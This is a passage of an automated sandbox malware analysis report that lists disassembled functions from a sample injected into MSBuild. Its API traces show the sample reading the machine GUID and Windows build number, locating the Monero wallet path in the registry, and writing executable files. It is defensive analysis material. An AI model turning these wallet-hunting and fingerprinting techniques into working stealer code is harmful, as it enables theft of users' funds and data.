                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: OpenProcess_memmove_memset
                                                                                                                                                                                                                      • String ID: N0ZWFt
                                                                                                                                                                                                                      • API String ID: 2647191932-431618156
                                                                                                                                                                                                                      • Opcode ID: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
                                                                                                                                                                                                                      • Instruction ID: eb1f70013287725bf786605e83da5f1b289e944c87060308bf9427b65ac1957a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 045191B1D0022C9FDB309F54DC85BDDB7B9AB44308F0001FAA609B7692D6796E89CF59
                                                                                                                                                                                                                      Function 00407FAC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60filememoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                                                                                      • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                                                                                      • LocalFree.KERNEL32(0040ECBC,?,?,?,?,0040E756,?,?,?), ref: 0040802B
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                      • String ID: V@
                                                                                                                                                                                                                      • API String ID: 2311089104-383300688
                                                                                                                                                                                                                      • Opcode ID: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
                                                                                                                                                                                                                      • Instruction ID: 10e4ee5bcd24e5c00d10c93a2cb3902743b6293cd5753d2e79081f11b23a5eb1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 47116070900204EFDF25DF64DD88EAF7BB9EB48741F20056AF481F2290EB769A85DB11
                                                                                                                                                                                                                      Function 004115D4 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 48registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00411607
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?), ref: 00411657
                                                                                                                                                                                                                      • CharToOemA.USER32(?,?), ref: 0041166B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CharCloseOpenQueryValue_memset
                                                                                                                                                                                                                      • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                                      • API String ID: 2235053359-1211650757
                                                                                                                                                                                                                      • Opcode ID: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
                                                                                                                                                                                                                      • Instruction ID: 75e31153c2228976b0cf0a8f1d4bbd960c746e32b60f2683a95406e25632d02a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC111EB590021DAFDB10DF90DC89FEAB7BDEB08309F4041E6A659E2052D7759F888F14
                                                                                                                                                                                                                      Function 00401A51 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 35registrymemoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00401A6C
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00401AE9), ref: 00401AAD
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • SOFTWARE\monero-project\monero-core, xrefs: 00401A7F
                                                                                                                                                                                                                      • wallet_path, xrefs: 00401A9C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                      • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                                                                                                                                                                                                      • API String ID: 3466090806-4244082812
                                                                                                                                                                                                                      • Opcode ID: 724872420e6656dc421950b0da405abf7eebffbf311253c609d29da366c3edf5
                                                                                                                                                                                                                      • Instruction ID: a12903c7620fb5d6c8df92349d75cdfb1a5743fd57e0ed8a0c6fb3df1ac1df80
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 724872420e6656dc421950b0da405abf7eebffbf311253c609d29da366c3edf5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ACF03075640304BFEB149B90DC0AFAA7A69DB44B06F141065B601B5190E6B66A509A24
                                                                                                                                                                                                                      Function 0041BC21 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,754074F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C), ref: 0041BC6E
                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,754074F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000), ref: 0041BCA6
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • pFJQUJRS470hoAQ0fjS0negYhpD/KnUnSgYhpMUvaiiwxuMGg+ppTSUDA0nSloxjtQCGk0HnNB/Sg8ZoKEpKU9aKAG9KOtKfrRQMbjiiiigaA9KTNL/WigYmMCkINOpO9ADTntR27UucmkNAwBpKXHPNGKBif54pKXH/6qO1ACUlKeOtFAxPajPBo7UUAJ15oIpcD3o6etACH86OKD1o/KgYlJml7Uf54oGHpSY9qX6UZoAbmjFL2pKADv6UgFKPrRig, xrefs: 0041BD36
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$CreatePointer
                                                                                                                                                                                                                      • String ID: pFJQUJRS470hoAQ0fjS0negYhpD/KnUnSgYhpMUvaiiwxuMGg+ppTSUDA0nSloxjtQCGk0HnNB/Sg8ZoKEpKU9aKAG9KOtKfrRQMbjiiiigaA9KTNL/WigYmMCkINOpO9ADTntR27UucmkNAwBpKXHPNGKBif54pKXH/6qO1ACUlKeOtFAxPajPBo7UUAJ15oIpcD3o6etACH86OKD1o/KgYlJml7Uf54oGHpSY9qX6UZoAbmjFL2pKADv6UgFKPrRig
                                                                                                                                                                                                                      • API String ID: 2024441833-698823426
                                                                                                                                                                                                                      • Opcode ID: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
                                                                                                                                                                                                                      • Instruction ID: ff1efad9a67633d22899531c3285d4c1b5d125596630838d4b1aaea72c6dc67b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA31A2F0504B049FDB348F24A9D4BA37AE8EB15314F108E2FF19682691D33898C49B99
                                                                                                                                                                                                                      Function 00410B30 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40registrymemoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B79
                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B95
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B9E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                      • String ID: Windows 11
                                                                                                                                                                                                                      • API String ID: 3466090806-2517555085
                                                                                                                                                                                                                      • Opcode ID: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
                                                                                                                                                                                                                      • Instruction ID: c636f12a4b9fd3341eb7223670fa9a8d4496e2c02347a6f2be12f88bf3247473
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1AF06875600304FBFF149BD1DC4AFAB7A7EEB4470AF1410A5F601D5190E7B6AA909714
                                                                                                                                                                                                                      Function 00410BA9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36registrymemoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BBD
                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BC4
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BE2
                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(00436888,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ), ref: 00410BFD
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410C06
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                      • String ID: CurrentBuildNumber
                                                                                                                                                                                                                      • API String ID: 3466090806-1022791448
                                                                                                                                                                                                                      • Opcode ID: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
                                                                                                                                                                                                                      • Instruction ID: adfa9e2f60a12e4d5f9b95a3627e322926d469c0f3b43989f67d349f50e983ff
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E9F09075640304BBEF159B90DC0AFAF7A7EEB44B06F240055F601A50A0E6B25A909B50
                                                                                                                                                                                                                      Function 0041566F Relevance: 9.1, APIs: 6, Instructions: 107registrystringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 004156A4
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 004156C4
                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 004156EA
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004156F6
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00415725
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 00415738
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcat$CloseOpenQueryValue_memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3891774339-0
                                                                                                                                                                                                                      • Opcode ID: 61c845370fa5e20ce0e4bed28fcb2d467033b3eb1257b194b560fd969d8f00f9
                                                                                                                                                                                                                      • Instruction ID: 247fa685f6815e34cff7f8df4b350b2d93bc7a81ee75f5ea83cfe721da60279c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 61c845370fa5e20ce0e4bed28fcb2d467033b3eb1257b194b560fd969d8f00f9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6941CE7194011D9FDF24EF60EC86EE8777ABB18309F4004AAB109A31A0EE759FC59F94
                                                                                                                                                                                                                      Function 00411757 Relevance: 9.1, APIs: 6, Instructions: 58commemoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 0041175E
                                                                                                                                                                                                                      • CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 0041178E
                                                                                                                                                                                                                      • _wtoi64.MSVCRT ref: 004117C1
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 004117DA
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 004117E1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 181426013-0
                                                                                                                                                                                                                      • Opcode ID: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
                                                                                                                                                                                                                      • Instruction ID: 49cd324ebe81867dc14fdb11462f5a122b1e841d4163eb6196de4943798d3ef6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
